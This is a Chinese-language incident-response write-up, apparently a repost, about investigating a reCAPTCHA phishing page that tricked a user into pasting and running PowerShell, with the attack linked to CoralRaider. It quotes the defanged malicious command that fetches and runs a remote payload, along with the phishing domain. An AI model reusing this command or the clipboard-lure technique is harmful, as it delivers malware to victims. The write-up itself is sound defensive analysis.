reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

admin 2025年6月7日10:18:15评论0 views字数 3087阅读10分17秒阅读模式
概述
微软活动目录域环境在当今的网络环境中扮演着重要的角色,尤其是外企,基本都会使用活动目录域环境来管理用户对象,计算机对象,打印机对象以及一些网络设备。通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。

之前在TG群里偶尔看到过利用reCAPTCHA钓鱼的文章,也没怎么关注,没想到今天在实际环境刚好遇到了,费了一番功夫才还原整个攻击过程。

下面将基于事件响应流程,分享下整个调查过程,希望通过这篇文章,能为大家提供一些思路,帮助更好地理解和防范这种类型的攻击。

01
识别 (Identification)

这里我们就直接从Identification阶段开始介绍,准备阶段涉及的内容比较多,涉及整个安全能力的建设,超出了本文的范围,大家如果需要,可以参考其他的资料。

在日常的安全事件的调查分析过程,发现MDE有个事件比较可疑:

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

第一反应还以为是有人在做渗透测试或者红队项目,但是因为操作比较敏感,先将主机使用MDE的Isolate (隔离)功能进行隔离,再进一步调查。

因为操作比较敏感,直接企微联系用户,确认是否是用户在测试。和用户确认后,用户都不知道powershell,渗透测试,红队是什么意思。所以可以确认是真实攻击。

询问用户在告警时间点前是否下载或者执行过什么文件,用户确认没有,只是反映说在那个时间点做了一个人机识别,但因为用户不懂技术,无法提供进一步的详细信息。

02
遏制 (Containment)

既然确认了是真实的攻击,就需要采取必要的遏制动作,避免事态进一步恶化。

  1. 首先是需要将受影响主机断开网络连接,其实之前已经做了

  2. 修改用户的账号密码

  3. 对Powershell命令里面涉及的域名进行封禁

这里我们需要考虑遏制动作带来的影响。如果攻击者已经在网络中驻留了比较长的时间,且可能存在不止一个驻留点。那我们的遏制操作可能会让攻击者意识到自己已经被发现,从而会立即采取一些行动,比如立即部署勒索软件,或者窃取敏感数据,或者执行一些破坏性的操作。所以大家在事件响应过程,每一个动作或者决策,都应该基于对已经收集的信息综合全面地分析和评估后,在确定下一步的动作。

因为这里我们已经经过初步调查和分析,判断是一个单点事件,且发现比较及时,所以可以立即采取必要的遏制动作。

03
根除 (Eradication)

要进行根除,我们需要确认攻击是如何发生的,攻击者的意图是什么,攻击成功后,做了哪些操作。

我们首先调查攻击是如何发生的。因为从用户访谈得知,当时在搜索一些素材,且没有下载和执行任何文件,而且MDE时间线也没有发现有可疑文件落地,整个进程链显示是用户在桌面运行了PowerShell执行了恶意指令。

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

所以初步调查思路是不是用户访问的网站提示用户执行什么操作,然后用户无意中执行了PowerShell命令。

先对MDE的时间线进行分析,发现没有可疑的网络请求。

因为当前环境所有用户上网都会经过Proxy,所以对该用户在事件发生时间点前后的网络访问日志进行分析。在对日志进行分析和过滤后,发现了几条比较可疑对记录:

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

刚开始想着把里面的域名全部导出来,在微步批量碰撞,但是没有发现可疑的记录。

所以接下来我们就对这些URL一个一个手动访问,这里也遇到了一个坑。最初是从最早的URL开始访问,但是访问了几个后,都没发现问题,就有点怀疑思路是否正确,因为这里已经过滤掉了很多,如果全部都手动访问,需要花费很长的时间。最后才想到从下载Powershell代码的域名开始,再往前一个一访问,很快就找到了用户访问的钓鱼页面:

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

访问钓鱼页面hxxps[:]//myroboex[.]online/6756cea04d0f7f006f4d141f后,会跳转到托在合法网站上面的一个人机验证的界面:

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

当点击I'm not a robot进行验证时,会将Powershell命令在后台复制到剪贴板,并提示用户执行一些列操作(实际是复制剪贴板里面的PowerShell命令并运行):

reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

实际执行的PowerShell命令:

powershell . *i*\\\\\\\\\*2msh*e hxxps[:]//poxile[.]shop/tozoplaying.m4a # ''Ι am nοt a rοbοt: гeСАРТСНА Verification ID: 62107

在上面的PowerShell命令执行后,就会执行后续的Payload,并创建启动项,具体大家有兴趣的可以对上面的脚本进行调式,分析下详细的行为。

通过威胁情报搜索,发现这个行为和CoralRaider 威胁活动者有关,但这次的初始攻击向量和之前这些文章里面提到的稍有差异:

  • https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/

  • https://www.bleepingcomputer.com/news/security/coralraider-attacks-use-cdn-cache-to-push-info-stealer-malware/ 

  • https://blog.talosintelligence.com/suspected-coralraider-continues-to-expand-victimology-using-three-information-stealers/

在还原了攻击过程后,因为经过初步分析,发现PowerShell命令执行后,被AMSI拦截,所以没造成进一步的影响。接下来,需要:

  1. 删除脚本执行过程创建的自启动项和脚本

  2. 执行Windows defender full scan和离线扫描

  3. 如果想将风险降到最低,重新安装受影响主机的系统。

04
恢复 (Recovery)

因为本次事件并没有造成进一步的影响,所以在根除阶段完成后,解锁用户电脑,并对这台电脑观察一段时间,看是否存在可疑行为。

当然,如前面所述,如果希望将风险降到最低,可以重装受影响主机的系统。

05
经验教训 (Lessons Learned)
  • 不管安全意识如何宣传,但是总会有用户上当受骗,所以技术控制还是很重要。

  • 网络安全监控(NSM)和终端安全监控(CSM)同样重要。虽然MDE目前是比较优秀的EDR解决方案(可以说很强),终端侧的活动基本都能记录到,但是在网络侧的记录还是稍有缺失。

  • 在SOC建设过程,对企业网络的可见性至关重要,有哪些资产,资产的属性及重要程度,不同的资产,需要接入哪些日志,如何存储和检索相关的日志,都需要针对性地提供解决方案。不知道国内的SOC现在怎么做的,但如果是以前的仅靠态势感知,那对终端的可见性是比较低的,事件调查,将很大程度依赖于终端的取证分析了。

  • 事件分析和调查,分析师的经验和直觉是比较重要,但也要注意认知偏见和思维定式。

总之,不要相信安全意识宣传后,用户就能识别所有的社会工程学攻击,一定要有技术控制。另外,在目前阶段,安全产品是否能够和AI深度融合,对多数企业来说,价值并不是很大,重要的是把网络侧监控(NSM)和终端侧监控(CSM)做好。

现在很多安全产品都在宣传和DeepSeek深度集成,但还是希望能够解决下比较朴实无华的问题,比如查一周的日志,需要十几分钟的问题(splunk几秒😎)。

IoC就不写了,变化太快了。。。大家要是有好的检测和防御思路,欢迎留言沟通交流。

原文始发于微信公众号(Desync InfoSec):reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日10:18:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?http://cn-sec.com/archives/3802540.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息